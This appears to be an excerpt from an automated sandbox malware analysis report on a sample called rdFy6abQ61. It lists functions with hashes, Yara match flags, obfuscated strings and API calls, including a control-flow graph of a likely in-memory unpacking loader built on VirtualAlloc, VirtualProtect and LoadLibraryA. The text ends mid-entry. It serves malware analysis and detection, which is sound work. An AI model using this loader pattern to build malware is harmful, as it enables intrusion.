                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 301V
                                                                              • API String ID: 0-2749669040
                                                                              • Opcode ID: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
                                                                              • Instruction ID: baf02472d42b1fd34baef0eca44314001f1f1136a433d7a2becac9f4216ef3dd
                                                                              • Opcode Fuzzy Hash: 833df5a93a9dfcddf4f429d08c48422bb21d6f1f0a3d624069caf29e04340d04
                                                                              • Instruction Fuzzy Hash: 6741BE742483118BD714DF54C8A4B6BB7F1FFC5308F08892DE4865B395E7B99608DB8A
                                                                              Function 00441B50 Relevance: .1, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                                              • Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
                                                                              • Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                                              • Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96
                                                                              Function 00441816 Relevance: .1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                                              • Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
                                                                              • Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                                              • Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A
                                                                              Function 020E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 111 20e003c-20e0047 112 20e004c-20e0263 call 20e0a3f call 20e0e0f call 20e0d90 VirtualAlloc 111->112 113 20e0049 111->113 128 20e028b-20e0292 112->128 129 20e0265-20e0289 call 20e0a69 112->129 113->112 131 20e02a1-20e02b0 128->131 133 20e02ce-20e03c2 VirtualProtect call 20e0cce call 20e0ce7 129->133 131->133 134 20e02b2-20e02cc 131->134 140 20e03d1-20e03e0 133->140 134->131 141 20e0439-20e04b8 VirtualFree 140->141 142 20e03e2-20e0437 call 20e0ce7 140->142 144 20e04be-20e04cd 141->144 145 20e05f4-20e05fe 141->145 142->140 147 20e04d3-20e04dd 144->147 148 20e077f-20e0789 145->148 149 20e0604-20e060d 145->149 147->145 153 20e04e3-20e0505 LoadLibraryA 147->153 151 20e078b-20e07a3 148->151 152 20e07a6-20e07b0 148->152 149->148 154 20e0613-20e0637 149->154 151->152 155 20e086e-20e08be LoadLibraryA 152->155 156 20e07b6-20e07cb 152->156 157 20e0517-20e0520 153->157 158 20e0507-20e0515 153->158 159 20e063e-20e0648 154->159 165 20e08c7-20e08f9 155->165 161 20e07d2-20e07d5 156->161 162 20e0526-20e0547 157->162 158->162 159->148 160 20e064e-20e065a 159->160 160->148 164 20e0660-20e066a 160->164 166 20e07d7-20e07e0 161->166 167 20e0824-20e0833 161->167 163 20e054d-20e0550 162->163 170 20e0556-20e056b 163->170 171 20e05e0-20e05ef 163->171 172 20e067a-20e0689 164->172 174 20e08fb-20e0901 165->174 175 20e0902-20e091d 165->175 168 20e07e4-20e0822 166->168 169 20e07e2 166->169 173 20e0839-20e083c 167->173 168->161 169->167 176 20e056f-20e057a 170->176 177 20e056d 170->177 171->147 178 20e068f-20e06b2 172->178 179 20e0750-20e077a 172->179 173->155 180 20e083e-20e0847 173->180 174->175 181 20e057c-20e0599 176->181 182 20e059b-20e05bb 176->182 177->171 183 20e06ef-20e06fc 178->183 184 20e06b4-20e06ed 178->184 179->159 185 20e084b-20e086c 180->185 186 20e0849 180->186 194 20e05bd-20e05db 181->194 182->194 188 20e06fe-20e0748 183->188 189 20e074b 183->189 184->183 185->173 186->155 188->189 189->172 194->163
                                                                              APIs
                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020E024D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID: cess$kernel32.dll
                                                                              • API String ID: 4275171209-1230238691
                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                              • Instruction ID: eb0f242f5703443693c8639c26dcadd2eec8494b01d7f8affdc10406fa1bd32a
                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                              • Instruction Fuzzy Hash: 57527A75A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54EAB351DB70AA85DF14
                                                                              Function 004423C5 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 004423C5
                                                                              • GetForegroundWindow.USER32 ref: 004423E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: ForegroundWindow
                                                                              • String ID:
                                                                              • API String ID: 2020703349-0
                                                                              • Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                                                              • Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
                                                                              • Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                                                              • Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E
                                                                              Function 020E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 515 20e0e0f-20e0e24 SetErrorMode * 2 516 20e0e2b-20e0e2c 515->516 517 20e0e26 515->517 517->516
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,020E0223,?,?), ref: 020E0E19
                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,020E0223,?,?), ref: 020E0E1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                              • Instruction ID: 1f3fb47f01235a72a762d1c9d8ab3db6e6df8a0f8847510d0ea92dc2c2c9df9a
                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                              • Instruction Fuzzy Hash: A7D0123114522877DB413A94DC09BCD7B5CDF05B66F008021FB0DE9180C7B0954046E5
                                                                              Function 0040D400 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                                                              • Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
                                                                              • Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
                                                                              • Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569
                                                                              Function 0040D433 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeSecurity
                                                                              • String ID:
                                                                              • API String ID: 640775948-0
                                                                              • Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                                                              • Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
                                                                              • Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
                                                                              • Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C
                                                                              Function 004404E2 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                                                              • Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
                                                                              • Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
                                                                              • Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8
                                                                              Function 004404B0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                                                              • Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
                                                                              • Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
                                                                              • Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98
                                                                              Function 005E0465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005E04B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                              • Instruction ID: 182139110b15671e2c3502b1b8a70a5972b767e38117f894c30218d15a7a9ed9
                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                              • Instruction Fuzzy Hash: A3112079A40208EFDB01DF99C985E98BFF5AF08351F058094F9489B361D371EA90DF40

                                                                              Non-executed Functions

                                                                              Function 004127E0 Relevance: 183.9, APIs: 3, Strings: 101, Instructions: 1937COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
                                                                              • API String ID: 0-299570860
                                                                              • Opcode ID: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
                                                                              • Instruction ID: 11c8b48c8f4a98f758d37e8cd5808665052ec381988852a9cf89f45dba9536ca
                                                                              • Opcode Fuzzy Hash: f5b952a7fa576cf3fac9bc8395e035e8ba89dd158049201593eea142aec36e13
                                                                              • Instruction Fuzzy Hash: CF03B07010C7C08AD3259B38C5883EFBFD1AB96314F188A6EE5E9873D2D7798585871B
                                                                              Function 020F2A47 Relevance: 182.2, APIs: 2, Strings: 101, Instructions: 1937COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $ ]ZN$ ]ZN$ ]ZN$!$!$"$"$$$$$$$%$&$'$'$($($*$+$+$,$-$.$.$0$0$1$1$2$3$4$4$6$6$6$8$8$9$:$:$<$=$>$@$@$A$B$B$D$D$D$D$E$F$H$J$J$L$L$L$M$N$N$N$P$Q$R$R$S$T$T$V$W$X$Z$\$^$`$a$b$d$e$f$f$m$p$p$q$q$r$t$v$v$w$w$x$y$z$z$|$~
                                                                              • API String ID: 0-299570860
                                                                              • Opcode ID: 25a80902b9933ed18a7334007feda52168da80d7d92116ce929127663f5e30fb
                                                                              • Instruction ID: 4a62a5c16a190828ada162cb4206e03a4d0e19ded930cb87405c3e3271053563
                                                                              • Opcode Fuzzy Hash: 25a80902b9933ed18a7334007feda52168da80d7d92116ce929127663f5e30fb
                                                                              • Instruction Fuzzy Hash: E903DE7014C7C08ED3A59B38C8883AFBBD1AB96324F088A6DD6D9877D2D7798145DB13
                                                                              Function 0041DE90 Relevance: 123.7, Strings: 98, Instructions: 1234COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
                                                                              • API String ID: 0-1873956536
                                                                              • Opcode ID: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
                                                                              • Instruction ID: 931559f782a0dae5da6d3a2348cda9da3af0ea84656c223040a8e2c7efec153d
                                                                              • Opcode Fuzzy Hash: fc18553a73c8fd4dc2fea3a9f9035c4283c881730360b760b769bf46582e99ae
                                                                              • Instruction Fuzzy Hash: DAB28F3160C7C08BD325DA38C85439FBBD1ABD6324F184A6DE8E98B3C2D6799849C757
                                                                              Function 020FE0F7 Relevance: 123.7, Strings: 98, Instructions: 1234COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !$&$'$($($*$.$/$4$4$6$7$9$:$<$>$?$?$?$?$B$C$C$D$D$E$F$F$G$G$H$I$J$L$L$L$L$L$N$P$Q$R$S$S$S$T$U$V$X$Z$Z$[$[$\$]$`$b$c$c$c$d$d$e$g$g$g$h$h$i$i$k$k$k$l$o$p$p$q$q$s$t$t$u$u$u$v$w$x$y$z${${${$|$|$}$~$~
                                                                              • API String ID: 0-1873956536
                                                                              • Opcode ID: 956e5634ba402c0b98be263ec24341df1d894c542c900cdbbef8950896477da6
                                                                              • Instruction ID: 848438288a82550640ef5fc412e664985f3ca6f232ab9041199f170ecd12db88
                                                                              • Opcode Fuzzy Hash: 956e5634ba402c0b98be263ec24341df1d894c542c900cdbbef8950896477da6
                                                                              • Instruction Fuzzy Hash: B8B2AD3160C3C08FD365CA28C85439EBBD2ABD6324F084A6DE5E98B7D1D7B99809D753
                                                                              Function 0042621B Relevance: 33.7, Strings: 26, Instructions: 1202COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: F;D$zx$'Y<[$(]2_$2U/W$2{<u$3416$3416$6fd$7J0H$7w$:vt$N>_<$SP$Ta\c$Teg$Vt%t$Z[$bxB$qVol$s@qF$wDuJ${HyN$jh$nl$zx
                                                                              • API String ID: 0-2025997952
                                                                              • Opcode ID: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
                                                                              • Instruction ID: 8ebcec6048e81b7414bf2c44ea1e9f7dace67e943cef4cf10300ed7be7304af5
                                                                              • Opcode Fuzzy Hash: d34ec39eb96bb7efa42d43d0cecc10ce8a4047bc9737a28ca6cdc305126fa738
                                                                              • Instruction Fuzzy Hash: D1B273B160C3918BD334CF14D8417ABBBF2FB95304F44892DD4C99B252D7798A4ADB8A
                                                                              Function 0211D337 Relevance: 27.2, APIs: 8, Strings: 7, Instructions: 957memorycomCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.COMBASE(80838290,00000000,00000001,?,00000000), ref: 0211D7D9
                                                                              • SysAllocString.OLEAUT32 ref: 0211D86F
                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0211D8AD
                                                                              • SysAllocString.OLEAUT32 ref: 0211D90F
                                                                              • SysAllocString.OLEAUT32 ref: 0211D9CC
                                                                              • VariantInit.OLEAUT32(?), ref: 0211DA3D
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0211DDC4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
                                                                              • String ID: fF$CfF$[B$[J$tu$yv${pqv
                                                                              • API String ID: 2895375541-1972840126
                                                                              • Opcode ID: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
                                                                              • Instruction ID: 3bb93ed39ade15dcd0c028bcf00f8428444c74c2e92410a49938f99d6fbf0c98
                                                                              • Opcode Fuzzy Hash: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
                                                                              • Instruction Fuzzy Hash: 266224726583508FE724CF28D8817ABBBE1EFC5314F19892CE5D58B390D7799809CB82
                                                                              Function 00417222 Relevance: 25.6, APIs: 4, Strings: 10, Instructions: 1137COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: pA$)$*$7$>gVf$TW$WH$X2c0$ruA$}&'$
                                                                              • API String ID: 0-2465278142
                                                                              • Opcode ID: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
                                                                              • Instruction ID: db295268db8bdf45a891635b6dee4b286def9570c954afad4e7b9bb962e3f9ad
                                                                              • Opcode Fuzzy Hash: 066c8ce5b71a5b696cd3803d73cf449c38db815dbdda3cc7b9b4004b6f854aec
                                                                              • Instruction Fuzzy Hash: 947211756483528BD324CF28C8917ABBBF1FF95314F18896DE4C58B3A1E7388945CB86
                                                                              Function 0041618C Relevance: 14.8, Strings: 11, Instructions: 1044COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$6y$EnA$YjM$YjM$fjM$fjM$pSlM$yx$y~${
                                                                              • API String ID: 0-2342033412
                                                                              • Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                                                              • Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
                                                                              • Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
                                                                              • Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A
                                                                              Function 00411BDE Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 555COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$&$5$A$J$t
                                                                              • API String ID: 0-1619763526
                                                                              • Opcode ID: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
                                                                              • Instruction ID: a53242e4cf12c94eabb5fc35352f39a952aaa25ff7b8dface19663bb3d57fcdd
                                                                              • Opcode Fuzzy Hash: 2bdb521bc7c73c0b7c7245bb86837fa704f627e98ff44684887737040ddb6845
                                                                              • Instruction Fuzzy Hash: FB22B07160C7808BC7249B38C5943AFBBE1ABC5324F184A2EE9E9D73C1D77889458B47
                                                                              Function 020F1E45 Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 555COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$&$5$A$J$t
                                                                              • API String ID: 0-1619763526
                                                                              • Opcode ID: 79d2da70b477ffa677f65aeaf4e6cacd56928a13efaa06ce3925f393d5a94fe9
                                                                              • Instruction ID: 412ecb98d645afef7d731c9e09e6a09523f2ed8f8794b25d63b7f14b421a2290
                                                                              • Opcode Fuzzy Hash: 79d2da70b477ffa677f65aeaf4e6cacd56928a13efaa06ce3925f393d5a94fe9
                                                                              • Instruction Fuzzy Hash: 1F229E7160C7808FC7649B38C4943AEBBE1AF95324F198A2DE9EA877C1D7748941DB42
                                                                              Function 00409B70 Relevance: 11.7, Strings: 9, Instructions: 418COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 37E0CC8E008D304A822D1F4978021086$EVA^$UJVM$VW$W$]NGD$b$~9$yD
                                                                              • API String ID: 0-4113535514
                                                                              • Opcode ID: 63948a1a35424d92484af45aa3e419c807616ca0303279be93579cff46dd4037
